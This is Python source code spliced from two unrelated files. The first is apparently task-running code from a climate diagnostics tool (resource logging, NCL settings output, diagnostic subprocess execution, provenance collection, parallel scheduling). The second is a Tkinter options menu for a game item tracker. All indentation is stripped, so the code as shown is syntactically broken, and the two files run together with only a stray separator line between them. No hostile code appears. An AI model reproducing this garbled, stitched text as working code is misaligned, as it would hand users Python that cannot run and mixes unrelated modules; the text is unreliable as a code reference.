"""Write resource usage to file."""
process = psutil.Process(pid)
start_time = time.time()
with open(filename, 'w') as file:
for msg, max_mem in _get_resource_usage(process, start_time,
children):
file.write(msg)
time.sleep(interval)
if halt.is_set():
logger.info('Maximum memory used (estimate): %.1f GB',
max_mem)
logger.info(
'Sampled every second. It may be inaccurate if short '
'but high spikes in memory consumption occur.')
return
thread = threading.Thread(target=_log_resource_usage)
thread.start()
try:
yield
finally:
halt.set()
thread.join()
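# Example (a sketch; `run_expensive_task` is a hypothetical workload):
#   with resource_usage_logger(os.getpid(), 'resource_usage.txt', interval=1):
#       run_expensive_task()  # usage of this process and its children is sampled every second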
def _py2ncl(value, var_name=''):
"""Format a structure of Python list/dict/etc items as NCL."""
txt = var_name + ' = ' if var_name else ''
if value is None:
txt += '_Missing'
elif isinstance(value, str):
txt += '"{}"'.format(value)
elif isinstance(value, (list, tuple)):
if not value:
txt += '_Missing'
else:
if isinstance(value[0], numbers.Real):
type_ = numbers.Real
else:
type_ = type(value[0])
if any(not isinstance(v, type_) for v in value):
raise ValueError(
"NCL array cannot be mixed type: {}".format(value))
txt += '(/{}/)'.format(', '.join(_py2ncl(v) for v in value))
elif isinstance(value, dict):
if not var_name:
raise ValueError(
"NCL does not support nested dicts: {}".format(value))
txt += 'True\n'
for key in value:
txt += '{}@{} = {}\n'.format(var_name, key, _py2ncl(value[key]))
else:
txt += str(value)
return txt
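# Examples (sketch):
#   _py2ncl([1, 2, 3], 'x')  -> 'x = (/1, 2, 3/)'
#   _py2ncl('K', 'units')    -> 'units = "K"'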
def write_ncl_settings(settings, filename, mode='wt'):
"""Write a dictionary with generic settings to NCL file."""
logger.debug("Writing NCL configuration file %s", filename)
def _ncl_type(value):
"""Convert some Python types to NCL types."""
typemap = {
bool: 'logical',
str: 'string',
float: 'double',
int: 'int64',
dict: 'logical',
}
for type_ in typemap:
if isinstance(value, type_):
return typemap[type_]
raise ValueError("Unable to map {} to an NCL type".format(type(value)))
lines = []
# ignore some settings for NCL diagnostic
ignore_settings = ['profile_diagnostic', ]
for sett in ignore_settings:
settings_copy = dict(settings)
if 'diag_script_info' not in settings_copy:
            settings_copy.pop(sett, None)
else:
settings_copy['diag_script_info'].pop(sett, None)
for var_name, value in sorted(settings_copy.items()):
if isinstance(value, (list, tuple)):
# Create an NCL list that can span multiple files
lines.append('if (.not. isdefined("{var_name}")) then\n'
' {var_name} = NewList("fifo")\n'
'end if\n'.format(var_name=var_name))
for item in value:
lines.append('ListAppend({var_name}, new(1, {type}))\n'
'i = ListCount({var_name}) - 1'.format(
var_name=var_name, type=_ncl_type(item)))
lines.append(_py2ncl(item, var_name + '[i]'))
else:
# Create an NCL variable that overwrites previous variables
lines.append('if (isvar("{var_name}")) then\n'
' delete({var_name})\n'
'end if\n'.format(var_name=var_name))
lines.append(_py2ncl(value, var_name))
with open(filename, mode) as file:
file.write('\n'.join(lines))
file.write('\n')
class BaseTask:
"""Base class for defining task classes."""
def __init__(self, ancestors=None, name='', products=None):
"""Initialize task."""
self.ancestors = [] if ancestors is None else ancestors
self.products = set() if products is None else set(products)
self.output_files = None
self.name = name
self.activity = None
self.priority = 0
def initialize_provenance(self, recipe_entity):
"""Initialize task provenance activity."""
if self.activity is not None:
raise ValueError(
"Provenance of {} already initialized".format(self))
self.activity = get_task_provenance(self, recipe_entity)
def flatten(self):
"""Return a flattened set of all ancestor tasks and task itself."""
tasks = TaskSet()
for task in self.ancestors:
tasks.update(task.flatten())
tasks.add(self)
return tasks
def run(self, input_files=None):
"""Run task."""
if not self.output_files:
if input_files is None:
input_files = []
for task in self.ancestors:
input_files.extend(task.run())
logger.info("Starting task %s in process [%s]", self.name,
os.getpid())
start = datetime.datetime.now()
self.output_files = self._run(input_files)
runtime = datetime.datetime.now() - start
logger.info("Successfully completed task %s (priority %s) in %s",
self.name, self.priority, runtime)
return self.output_files
@abc.abstractmethod
def _run(self, input_files):
"""Run task."""
def get_product_attributes(self) -> dict:
"""Return a mapping of product attributes."""
return {
product.filename: product.attributes
for product in self.products
}
def print_ancestors(self):
"""Return a nicely formatted description."""
txt = 'ancestors:\n{}'.format('\n\n'.join(
textwrap.indent(str(task), prefix=' ')
for task in self.ancestors) if self.ancestors else 'None')
return txt
def __repr__(self):
"""Return canonical string representation."""
return f"{self.__class__.__name__}({repr(self.name)})"
class ResumeTask(BaseTask):
"""Task for re-using preprocessor output files from a previous run."""
def __init__(self, prev_preproc_dir, preproc_dir, name):
"""Create a resume task."""
# Set the path to the file resulting from running this task
self._metadata_file = preproc_dir / 'metadata.yml'
# Reconstruct output
prev_metadata_file = prev_preproc_dir / 'metadata.yml'
with prev_metadata_file.open('rb') as file:
prev_metadata = yaml.safe_load(file)
products = set()
for prov_filename, attributes in prev_metadata.items():
# Update the filename in case the output directory was moved
# since the original run
filename = str(prev_preproc_dir / Path(prov_filename).name)
attributes['filename'] = filename
product = TrackedFile(filename,
attributes,
prov_filename=prov_filename)
products.add(product)
super().__init__(ancestors=None, name=name, products=products)
def _run(self, _):
"""Return the result of a previous run."""
metadata = self.get_product_attributes()
# Write metadata to file
self._metadata_file.parent.mkdir(parents=True)
with self._metadata_file.open('w') as file:
yaml.safe_dump(metadata, file)
return [str(self._metadata_file)]
class DiagnosticError(Exception):
"""Error in diagnostic."""
class DiagnosticTask(BaseTask):
"""Task for running a diagnostic."""
def __init__(self, script, settings, output_dir, ancestors=None, name=''):
"""Create a diagnostic task."""
super().__init__(ancestors=ancestors, name=name)
self.script = script
self.settings = settings
self.output_dir = output_dir
self.cmd = self._initialize_cmd()
self.env = self._initialize_env()
self.log = Path(settings['run_dir']) / 'log.txt'
self.resource_log = Path(settings['run_dir']) / 'resource_usage.txt'
def _initialize_cmd(self):
"""Create an executable command from script."""
diagnostics_root = DIAGNOSTICS.scripts
script = self.script
script_file = (diagnostics_root / Path(script).expanduser()).absolute()
err_msg = f"Cannot execute script '{script}' ({script_file})"
if not script_file.is_file():
raise DiagnosticError(f"{err_msg}: file does not exist.")
cmd = []
interpreters = {
'jl': 'julia',
'ncl': 'ncl',
'py': 'python',
'r': 'Rscript',
}
args = {
'ncl': ['-n', '-p'],
}
if self.settings['profile_diagnostic']:
profile_file = Path(self.settings['run_dir'], 'profile.json')
args['py'] = ['-m', 'vprof', '-o', str(profile_file), '-c', 'c']
ext = script_file.suffix.lower()[1:]
if ext in interpreters:
if ext == 'py' and sys.executable:
interpreter = sys.executable
else:
interpreter = which(interpreters[ext])
if interpreter is None:
raise DiagnosticError(
f"{err_msg}: program '{interpreters[ext]}' not installed.")
cmd.append(interpreter)
elif not os.access(script_file, os.X_OK):
raise DiagnosticError(
f"{err_msg}: non-executable file with unknown extension "
f"'{script_file.suffix}'.")
cmd.extend(args.get(ext, []))
cmd.append(str(script_file))
return cmd
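# Illustrative example (hypothetical paths, assuming profiling is disabled):
# for a Python diagnostic 'examples/diagnostic.py' the method above would
# typically return
#     [sys.executable, '/path/to/diag_scripts/examples/diagnostic.py']
# whereas an NCL diagnostic 'examples/diagnostic.ncl' would yield
#     ['/usr/bin/ncl', '-n', '-p', '/path/to/diag_scripts/examples/diagnostic.ncl']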
def _initialize_env(self):
"""Create an environment for executing script."""
ext = Path(self.script).suffix.lower()
env = {}
if ext in ('.py', '.jl'):
# Set non-interactive matplotlib backend
env['MPLBACKEND'] = 'Agg'
if ext in ('.r', '.ncl'):
# Make diag_scripts path available to the diagnostic script
env['diag_scripts'] = str(DIAGNOSTICS.scripts)
if ext == '.jl':
# Set the julia virtual environment
env['JULIA_LOAD_PATH'] = "{}:{}".format(
DIAGNOSTICS.path / 'install' / 'Julia',
os.environ.get('JULIA_LOAD_PATH', ''),
)
return env
def write_settings(self):
"""Write settings to file."""
run_dir = Path(self.settings['run_dir'])
run_dir.mkdir(parents=True, exist_ok=True)
# ignore some settings for diagnostic
ignore_settings = ['profile_diagnostic', ]
settings_copy = dict(self.settings)
for sett in ignore_settings:
settings_copy.pop(sett, None)
filename = run_dir / 'settings.yml'
filename.write_text(yaml.safe_dump(settings_copy))
# If running an NCL script:
if Path(self.script).suffix.lower() == '.ncl':
# Also write an NCL file and return the name of that instead.
return self._write_ncl_settings()
return str(filename)
def _write_ncl_settings(self):
"""Write settings to NCL file."""
filename = Path(self.settings['run_dir']) / 'settings.ncl'
config_user_keys = {
'run_dir',
'plot_dir',
'work_dir',
'output_file_type',
'log_level',
}
settings = {'diag_script_info': {}, 'config_user_info': {}}
for key, value in self.settings.items():
if key in config_user_keys:
settings['config_user_info'][key] = value
elif not isinstance(value, dict):
settings['diag_script_info'][key] = value
else:
settings[key] = value
write_ncl_settings(settings, filename)
return filename
def _control_ncl_execution(self, process, lines):
"""Check if an error has occurred in an NCL script.
Apparently NCL does not automatically exit with a non-zero exit
code if an error occurs, so we take care of that here.
"""
ignore_warnings = [
warning.strip()
for warning in self.settings.get('ignore_ncl_warnings', [])
]
errors = ['error:', 'fatal:']
if self.settings['exit_on_ncl_warning']:
errors.append('warning:')
msg = ("An error occurred during execution of NCL script {}, "
"see the log in {}".format(self.script, self.log))
warned = False
for line in lines:
if line.strip() in ignore_warnings:
continue
if 'warning:' in line:
logger.warning("NCL: %s", line)
warned = True
for error in errors:
if error in line:
logger.error(msg)
logger.error("NCL: %s", line)
try:
process.kill()
except OSError: # ignore error if process already exited
pass
else:
logger.error("Killed process.")
raise DiagnosticError(msg)
if warned:
logger.warning(
"There were warnings during the execution of NCL script %s, "
"for details, see the log %s", self.script, self.log)
def _start_diagnostic_script(self, cmd, env):
"""Start the diagnostic script."""
logger.info("Running command %s", cmd)
logger.debug("in environment\n%s", pprint.pformat(env))
cwd = self.settings['run_dir']
logger.debug("in current working directory: %s", cwd)
logger.info("Writing output to %s", self.output_dir)
logger.info("Writing plots to %s", self.settings['plot_dir'])
logger.info("Writing log to %s", self.log)
rerun_msg = 'cd {}; '.format(cwd)
if env:
rerun_msg += ' '.join('{}="{}"'.format(k, env[k]) for k in env)
if "vprof" in cmd:
script_args = ' "' + cmd[-1] + '"'
rerun_msg += ' ' + ' '.join(cmd[:-1]) + script_args
else:
rerun_msg += ' ' + ' '.join(cmd)
logger.info("To re-run this diagnostic script, run:\n%s", rerun_msg)
complete_env = dict(os.environ)
complete_env.update(env)
process = subprocess.Popen(
cmd,
bufsize=2**20, # Use a large buffer to prevent NCL crash
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd=cwd,
env=complete_env,
)
return process
def _run(self, input_files):
"""Run the diagnostic script."""
if self.script is None: # Run only preprocessor
output_files = []
return output_files
ext = Path(self.script).suffix.lower()
if ext == '.ncl':
self.settings['input_files'] = [
f for f in input_files
if f.endswith('.ncl') or os.path.isdir(f)
]
else:
self.settings['input_files'] = [
f for f in input_files
if f.endswith('.yml') or os.path.isdir(f)
]
env = dict(self.env)
cmd = list(self.cmd)
settings_file = self.write_settings()
if ext == '.ncl':
env['settings'] = settings_file
else:
if self.settings['profile_diagnostic']:
script_file = cmd.pop()
combo_with_settings = script_file + ' ' + str(settings_file)
cmd.append(combo_with_settings)
else:
cmd.append(settings_file)
process = self._start_diagnostic_script(cmd, env)
returncode = None
with resource_usage_logger(process.pid, self.resource_log),\
open(self.log, 'ab') as log:
last_line = ['']
while returncode is None:
returncode = process.poll()
txt = process.stdout.read()
log.write(txt)
# Check if an error occurred in an NCL script
# Last line is treated separately to avoid missing
# error messages spread out over multiple lines.
if ext == '.ncl':
txt = txt.decode(encoding='utf-8', errors='ignore')
lines = txt.split('\n')
self._control_ncl_execution(process, last_line + lines)
last_line = lines[-1:]
# wait, but not long because the stdout buffer may fill up:
# https://docs.python.org/3.6/library/subprocess.html#subprocess.Popen.stdout
time.sleep(0.001)
if returncode == 0:
logger.debug("Script %s completed successfully", self.script)
self._collect_provenance()
return [self.output_dir]
raise DiagnosticError(
"Diagnostic script {} failed with return code {}. See the log "
"in {}".format(self.script, returncode, self.log))
def _collect_provenance(self):
"""Process provenance information provided by the diagnostic script."""
provenance_file = Path(
self.settings['run_dir']) / 'diagnostic_provenance.yml'
if not provenance_file.is_file():
logger.warning(
"No provenance information was written to %s. Unable to "
"record provenance for files created by diagnostic script %s "
"in task %s", provenance_file, self.script, self.name)
return
logger.debug("Collecting provenance from %s", provenance_file)
start = time.time()
table = yaml.safe_load(provenance_file.read_text())
ignore = (
'auxiliary_data_dir',
'exit_on_ncl_warning',
'input_files',
'log_level',
'output_file_type',
'plot_dir',
'profile_diagnostic',
'recipe',
'run_dir',
'version',
'write_ncl_interface',
'work_dir',
)
attrs = {
'script_file': self.script,
}
for key in self.settings:
if key not in ignore:
attrs[key] = self.settings[key]
ancestor_products = {
p.filename: p
for a in self.ancestors for p in a.products
}
valid = True
for filename, attributes in table.items():
# copy to avoid updating other entries if file contains anchors
attributes = deepcopy(attributes)
ancestor_files = attributes.pop('ancestors', [])
if not ancestor_files:
logger.warning(
"No ancestor files specified for recording provenance of "
"%s, created by diagnostic script %s in task %s", filename,
self.script, self.name)
valid = False
ancestors = set()
if isinstance(ancestor_files, str):
logger.warning(
"Ancestor file(s) %s specified for recording provenance "
"of %s, created by diagnostic script %s in task %s is "
"a string but should be a list of strings", ancestor_files,
filename, self.script, self.name)
ancestor_files = [ancestor_files]
for ancestor_file in ancestor_files:
if ancestor_file in ancestor_products:
ancestors.add(ancestor_products[ancestor_file])
else:
valid = False
logger.warning(
"Invalid ancestor file %s specified for recording "
"provenance of %s, created by diagnostic script %s "
"in task %s", ancestor_file, filename, self.script,
self.name)
attributes.update(deepcopy(attrs))
TAGS.replace_tags_in_dict(attributes)
product = TrackedFile(filename, attributes, ancestors)
product.initialize_provenance(self.activity)
_write_citation_files(product.filename, product.provenance)
product.save_provenance()
self.products.add(product)
if not valid:
logger.warning(
"Valid ancestor files for diagnostic script %s in task %s "
"are:\n%s", self.script, self.name,
'\n'.join(ancestor_products))
logger.debug("Collecting provenance of task %s took %.1f seconds",
self.name,
time.time() - start)
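# For reference, a minimal diagnostic_provenance.yml consumed above might look
# like this (hypothetical file names); each key is a file written by the
# diagnostic, and 'ancestors' lists the preprocessor files it was derived from:
#     /path/to/work_dir/diag/script/timeseries.nc:
#       caption: Global mean temperature timeseries.
#       ancestors:
#         - /path/to/preproc_dir/diag/tas/CMIP6_Model_tas.nc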
def __repr__(self):
"""Get human readable description."""
settings_string = pprint.pformat(self.settings)
string = (f"{self.__class__.__name__}: {self.name}\n"
f"script: {self.script}\n"
f"settings:\n{settings_string}\n"
f"{self.print_ancestors()}\n")
return string
class TaskSet(set):
"""Container for tasks."""
def flatten(self) -> 'TaskSet':
"""Flatten the list of tasks."""
return TaskSet(t for task in self for t in task.flatten())
def get_independent(self) -> 'TaskSet':
"""Return a set of independent tasks."""
independent_tasks = TaskSet()
all_tasks = self.flatten()
for task in all_tasks:
if not any(task in t.ancestors for t in all_tasks):
independent_tasks.add(task)
return independent_tasks
def run(self, max_parallel_tasks: int = None) -> None:
"""Run tasks.
Parameters
----------
max_parallel_tasks : int
Number of processes to run. If `1`, run the tasks sequentially.
"""
if max_parallel_tasks == 1:
self._run_sequential()
else:
self._run_parallel(max_parallel_tasks)
def _run_sequential(self) -> None:
"""Run tasks sequentially."""
n_tasks = len(self.flatten())
logger.info("Running %s tasks sequentially", n_tasks)
tasks = self.get_independent()
for task in sorted(tasks, key=lambda t: t.priority):
task.run()
def _run_parallel(self, max_parallel_tasks=None):
"""Run tasks in parallel."""
scheduled = self.flatten()
running: Dict[BaseTask, ApplyResult] = {}
n_tasks = n_scheduled = len(scheduled)
n_running = 0
if max_parallel_tasks is None:
max_parallel_tasks = os.cpu_count()
max_parallel_tasks = min(max_parallel_tasks, n_tasks)
logger.info("Running %s tasks using %s processes", n_tasks,
max_parallel_tasks)
def done(task):
"""Assume a task is done if it not scheduled or running."""
return not (task in scheduled or task in running)
with Pool(processes=max_parallel_tasks) as pool:
while scheduled or running:
# Submit new tasks to pool
for task in sorted(scheduled, key=lambda t: t.priority):
if len(running) >= max_parallel_tasks:
break
if all(done(t) for t in task.ancestors):
future = pool.apply_async(_run_task, [task])
running[task] = future
scheduled.remove(task)
# Handle completed tasks
ready = {t for t in running if running[t].ready()}
for task in ready:
_copy_results(task, running[task])
running.pop(task)
# Wait if there are still tasks running
if running:
time.sleep(0.1)
# Log progress message
if len(scheduled) != n_scheduled or len(running) != n_running:
n_scheduled, n_running = len(scheduled), len(running)
n_done = n_tasks - n_scheduled - n_running
logger.info(
"Progress: %s tasks running, %s tasks waiting for "
"ancestors, %s/%s done", n_running, n_scheduled,
n_done, n_tasks)
logger.info("Successfully completed all tasks.")
pool.close()
pool.join()
def _copy_results(task, future):
"""Update task with the results from the remote process."""
task.output_files, task.products = future.get()
def _run_task(task):
"""Run task and return the result."""
output_files = task.run()
return output_files, task.products
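# Usage sketch (hypothetical objects, not part of this module): build a small
# task graph and run it with a limited number of worker processes.
#     diagnostic = DiagnosticTask(script='plot.py', settings=settings,
#                                 output_dir=output_dir,
#                                 ancestors=[preprocessing_task], name='diag/plot')
#     tasks = TaskSet({diagnostic})
#     tasks.run(max_parallel_tasks=2)
# TaskSet.run() flattens the graph, schedules tasks whose ancestors have
# finished, and copies output_files and products back from the worker processes.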
|
option_picker.py
|
import traceback
from Tkinter import *
from multiprocessing import Queue
from Queue import Empty  # raised by a non-blocking get() on an empty queue
from tkColorChooser import askcolor
import json
from string import maketrans, lower
import re
import ttk
import pygame.sysfont
from options import Options
import logging
import urllib2
import webbrowser
import platform
import threading
from error_stuff import log_error
class OptionsMenu(object):
"""
Tkinter options menu: builds the options window and writes the user's
choices back to the Options object when saved.
"""
def __init__(self):
self.options = Options()
self.root = Tk()
self.root.destroy()
# Our 'safe' list of fonts that should work in pygame
self.fonts = ['Andalus', 'Angsana New', 'AngsanaUPC', 'Arial', 'Arial Black', 'Browallia New', 'BrowalliaUPC',
'Comic Sans MS', 'Cordia New', 'CordiaUPC', 'Courier New', 'DFKai-SB', 'David', 'DilleniaUPC',
'Estrangelo Edessa', 'FrankRuehl', 'Franklin Gothic Medium', 'Gautami', 'Georgia', 'Impact',
'IrisUPC', 'JasmineUPC', 'KodchiangUPC', 'Latha', 'LilyUPC', 'Lucida Console', 'MV Boli',
'Mangal', 'Microsoft Sans Serif', 'Miriam', 'Miriam Fixed', 'Narkisim', 'Raavi', 'Rod', 'Shruti',
'SimHei', 'Simplified Arabic', 'Simplified Arabic Fixed', 'Sylfaen', 'Tahoma', 'Times New Roman',
'Traditional Arabic', 'Trebuchet MS', 'Tunga', 'Verdana', 'simsunnsimsun']
self.game_versions = ['Rebirth',
'Afterbirth', 'Afterbirth+', 'Antibirth']
self.network_queue = Queue()
# Check if the system has the fonts installed, and remove them from the list if it doesn't
try:
valid_pygame_fonts = [lower(x.replace(" ", ""))
for x in self.fonts]
system_fonts = pygame.sysfont.get_fonts()
to_delete = []
for index, font in enumerate(valid_pygame_fonts):
if font not in system_fonts:
to_delete += [index]
for index in to_delete[::-1]:
del self.fonts[index]
except:
log_error(
"There may have been an error detecting system fonts.\n" + traceback.print_exc())
pretty_name_map = {"read_from_server": "Watch Someone Else",
"write_to_server": "Let Others Watch Me",
"twitch_name": "Their Twitch Name",
"bold_font": "Bold",
"blck_cndl_mode": "BLCK CNDL mode",
"custom_title_enabled": "Change Window Title",
"log_file_check_seconds": "Check log file every"}
label_after_text = {"message_duration": "second(s)",
"framerate_limit": "fps",
"log_file_check_seconds": "second(s)"}
connection_labels = {"starting": "Connecting to server for player list...",
"done": "Connecting to server for player list... Done",
"fail": "Connecting to server for player list... Failed"}
def pretty_name(self, s):
# Change from a var name to something you'd show the users
if self.pretty_name_map.has_key(s):
return self.pretty_name_map.get(s)
return " ".join(s.split("_")).title()
def color_callback(self, source):
# Prompt a color picker, set the options and the background/foreground of the button
nums, hex_color = askcolor(color=getattr(
self.options, source), title="Color Chooser")
if hex_color:
opposite = self.opposite_color(hex_color)
setattr(self.options, source, hex_color.upper())
self.buttons[source].configure(bg=hex_color, fg=opposite)
def checkbox_callback(self):
# Just for the "show decription" checkbox -- to disable the message duration entry
if not self.checks.get("show_description").get():
self.entries["message_duration"].configure(state=DISABLED)
else:
self.entries["message_duration"].configure(state=NORMAL)
# Disable custom message if we don't have to show it
if not self.checks.get("show_status_message").get():
self.entries["status_message"].configure(state=DISABLED)
else:
self.entries["status_message"].configure(state=NORMAL)
# Just for the "Custom Title Enabled" checkbox -- to disable the "Custom Title" entry
if not self.checks.get("custom_title_enabled").get():
self.entries["custom_title"].configure(state=DISABLED)
else:
self.entries["custom_title"].configure(state=NORMAL)
# Writing to server occurs when state changes, so enable read delay if we are reading
if self.checks.get("read_from_server").get():
self.entries["read_delay"].grid()
self.entries["twitch_name"].grid()
self.labels["read_delay"].grid()
self.labels["twitch_name"].grid()
else:
self.entries["read_delay"].grid_remove()
self.entries["twitch_name"].grid_remove()
self.labels["read_delay"].grid_remove()
self.labels["twitch_name"].grid_remove()
self.labels["server_connect_label"].config(text="")
if self.checks.get("change_server").get():
self.entries["trackerserver_url"].grid()
self.labels["trackerserver_url"].grid()
else:
self.entries["trackerserver_url"].grid_remove()
self.labels["trackerserver_url"].grid_remove()
# Disable authkey if we don't write to server
if self.checks.get("write_to_server").get():
self.entries["trackerserver_authkey"].grid()
self.labels["trackerserver_authkey"].grid()
self.buttons["authkey_button"].grid()
else:
self.entries["trackerserver_authkey"].grid_remove()
self.labels["trackerserver_authkey"].grid_remove()
self.buttons["authkey_button"].grid_remove()
def read_callback(self):
if self.checks.get("read_from_server").get():
self.checks.get("write_to_server").set(0)
self.labels["server_connect_label"].config(
text=self.connection_labels["starting"])
t = threading.Thread(target=self.get_server_userlist_and_enqueue)
t.start()
self.checkbox_callback()
def write_callback(self):
if self.checks.get("write_to_server").get():
self.checks.get("read_from_server").set(0)
self.checkbox_callback()
def save_callback(self):
# Callback for the "save" option -- rejiggers options and saves to options.json, then quits
for key, value in self.entries.iteritems():
if key in self.integer_keys:
# Cast this as a float first to avoid errors if the user puts a value of 1.0 in an options, for example
setattr(self.options, key, int(float(value.get())))
elif key in self.float_keys:
val = float(value.get())
setattr(self.options, key, val)
elif hasattr(value, "get"):
setattr(self.options, key, value.get())
for key, value in self.checks.iteritems():
setattr(self.options, key, True if value.get() else False)
self.root.destroy()
def seconds_to_text(self, seconds):
if seconds < 60:
return str(seconds) + " second" + ("s" if seconds > 1 else "")
minutes = seconds / 60
if minutes < 60:
return str(minutes) + " minute" + ("s" if minutes > 1 else "")
hours = minutes / 60
if hours < 24:
return str(hours) + " hour" + ("s" if hours > 1 else "")
days = hours / 24
return str(days) + " day" + ("s" if days > 1 else "")
def get_server_userlist_and_enqueue(self):
try:
url = self.entries['trackerserver_url'].get() + \
"/tracker/api/userlist/"
json_state = urllib2.urlopen(url).read()
users = json.loads(json_state)
success = True
except Exception:
log_error(
"Problem getting userlist from tracker server\n" + traceback.format_exc())
users = []
success = False
network_result = {"users": users, "success": success}
self.network_queue.put(network_result)
def get_server_twitch_client_id(self):
try:
url = self.entries['trackerserver_url'].get(
) + "/tracker/api/twitchclientid/"
return urllib2.urlopen(url).read()
except Exception:
log_error(
"Couldn't get twitch client id from tracker server\n" + traceback.format_exc())
return None
def process_network_results(self):
# On OSX, Queue.qsize() is not implemented, so poll with empty() instead.
while not self.network_queue.empty():
try:
network_result = self.network_queue.get(0)
users_combobox_list = []
for user in network_result["users"]:
formatted_time_ago = self.seconds_to_text(user["seconds"])
list_entry = user["name"] + \
" (updated " + formatted_time_ago + " ago)"
users_combobox_list.append(list_entry)
self.entries['twitch_name']['values'] = users_combobox_list
label = "done" if network_result["success"] else "fail"
self.labels["server_connect_label"].config(
text=self.connection_labels[label])
except Empty:
pass
self.root.after(100, self.process_network_results)
def trim_name(self, event):
name = self.entries['twitch_name'].get()
name = name.partition(" (")[0]
self.entries['twitch_name'].set(name)
# From: http://code.activestate.com/recipes/527747-invert-css-hex-colors/
def opposite_color(self, color):
# Get the opposite color of a hex color, just to make text on buttons readable
color = color.lower()
table = maketrans('0123456789abcdef', 'fedcba9876543210')
return str(color).translate(table).upper()
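# Worked example: '#1A2B3C' maps digit-for-digit through the translation table
# to '#E5D4C3' (each hex digit x becomes 15 - x); the leading '#' is unchanged.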
# From: http://stackoverflow.com/questions/4140437/interactively-validating-entry-widget-content-in-tkinter
def ValidateNumeric(self, d, i, P, s, S, v, V, W):
# This validation is a biiit janky, just some crazy regex that checks P (value of entry after modification)
return P == "" or re.search("^\d+(\.\d*)?$", P) is not None
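# Examples: the check accepts '', '42', '3.' and '3.14', but rejects 'abc',
# '1.2.3', '.5' and '-5', so only non-negative numeric input gets through.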
def run(self):
# Create root
self.root = Tk()
self.root.attributes("-topmost", True)
self.root.wm_title("Item Tracker Options")
self.root.resizable(False, False)
if platform.system() == "Darwin":
self.root.iconbitmap('options.ico')
else:
self.root.iconbitmap(default='options.ico')
# Generate numeric options by looping over option types
self.integer_keys = ["message_duration",
"framerate_limit", "read_delay"]
self.float_keys = ["size_multiplier", "log_file_check_seconds"]
self.entries = {}
self.labels = {}
self.checks = {}
self.buttons = {}
# Draw the "Text Options" box
text_options_frame = LabelFrame(
self.root, text="Text Options", padx=20, pady=20)
text_options_frame.grid(row=0, column=0, padx=5, pady=5)
validate_numeric_field = (self.root.register(
self.ValidateNumeric), '%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')
next_row = 0
for index, opt in enumerate(["message_duration"]):
Label(text_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
self.entries[opt] = Entry(
text_options_frame, validate="key", validatecommand=validate_numeric_field)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
if opt in self.label_after_text:
Label(text_options_frame, text=self.label_after_text[opt]).grid(
row=next_row, column=2)
next_row += 1
for index, opt in enumerate(["show_font"]):
Label(text_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
initialfont = StringVar()
initialfont.set(getattr(self.options, opt))
self.entries[opt] = ttk.Combobox(text_options_frame, values=sorted(
self.fonts), textvariable=initialfont, state='readonly')
self.entries[opt].grid(row=next_row, column=1)
for index, opt in enumerate(["bold_font"]):
self.checks[opt] = IntVar()
c = Checkbutton(text_options_frame, text=self.pretty_name(
opt), variable=self.checks[opt])
c.grid(row=next_row, column=2)
next_row += 1
if getattr(self.options, opt):
c.select()
for index, opt in enumerate(["status_message"]):
Label(text_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
self.entries[opt] = Entry(text_options_frame)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
next_row += 1
text_checkboxes = ["show_description",
"show_status_message", "word_wrap"]
for index, opt in enumerate(text_checkboxes):
self.checks[opt] = IntVar()
c = Checkbutton(text_options_frame, text=self.pretty_name(
opt), variable=self.checks[opt])
c.grid(row=len(text_checkboxes) + 1 + index / 2,
column=index % 2) # 2 checkboxes per row
if getattr(self.options, opt):
c.select()
# Disable letting the user set the message duration if the show description option is disabled
if opt == "show_description" or opt == "show_status_message":
c.configure(command=self.checkbox_callback)
# Draw the other options box
display_options_frame = LabelFrame(
self.root, text="", padx=20, pady=20)
display_options_frame.grid(row=1, column=0, padx=5, pady=5)
next_row = 0
for index, opt in enumerate(["game_version"]):
Label(display_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
initialversion = StringVar()
initialversion.set(getattr(self.options, opt))
self.entries[opt] = ttk.Combobox(
display_options_frame, values=self.game_versions, textvariable=initialversion, state='readonly')
self.entries[opt].grid(row=next_row, column=1)
next_row += 1
for index, opt in enumerate(["framerate_limit", "log_file_check_seconds", "size_multiplier"]):
Label(display_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
self.entries[opt] = Entry(
display_options_frame, validate="key", validatecommand=validate_numeric_field)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
if opt in self.label_after_text:
Label(display_options_frame, text=self.label_after_text[opt]).grid(
row=next_row, column=2)
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["item_details_link"]):
Label(display_options_frame, text=self.pretty_name(
opt)).grid(row=next_row)
self.entries[opt] = Entry(display_options_frame)
self.entries[opt].grid(row=next_row, column=1)
self.entries[opt].insert(0, getattr(self.options, opt))
next_row += 1
# Generate buttons by looping over option types
for index, opt in enumerate(["background_color", "text_color"]):
self.buttons[opt] = Button(
display_options_frame,
text=self.pretty_name(opt),
bg=getattr(self.options, opt),
fg=self.opposite_color(getattr(self.options, opt)),
command=lambda opt=opt: self.color_callback(opt)
)
self.buttons[opt].grid(row=len(self.entries), column=index)
# Generate checkboxes, with special exception for show_description for message duration
for index, opt in enumerate(
["enable_mouseover", "show_floors", "show_rerolled_items", "show_health_ups",
"show_space_items", "show_blind_icon", "make_items_glow", "blck_cndl_mode",
"check_for_updates", "custom_title_enabled"]):
self.checks[opt] = IntVar()
c = Checkbutton(display_options_frame, text=self.pretty_name(
opt), variable=self.checks[opt])
c.grid(row=len(self.entries) + 1 + index / 2,
column=index % 2) # 2 checkboxes per row
if getattr(self.options, opt):
c.select()
if opt == "custom_title_enabled":
c.configure(command=self.checkbox_callback)
next_row += len(self.entries) / 2 + 1
# Generate label for custom title
Label(display_options_frame, text=self.pretty_name(
"custom_title")).grid(row=next_row)
self.entries["custom_title"] = Entry(display_options_frame)
self.entries["custom_title"].grid(row=next_row, column=1)
self.entries["custom_title"].insert(
0, getattr(self.options, "custom_title"))
next_row += 1
# Draw the "Tournament Settings" box
tournament_settings_frame = LabelFrame(
self.root, text="Tournament Settings", padx=20, pady=20)
tournament_settings_frame.grid(row=0, column=1, rowspan=2, sticky=N)
next_row = 0
for index, opt in enumerate(["change_server"]):
self.checks[opt] = IntVar()
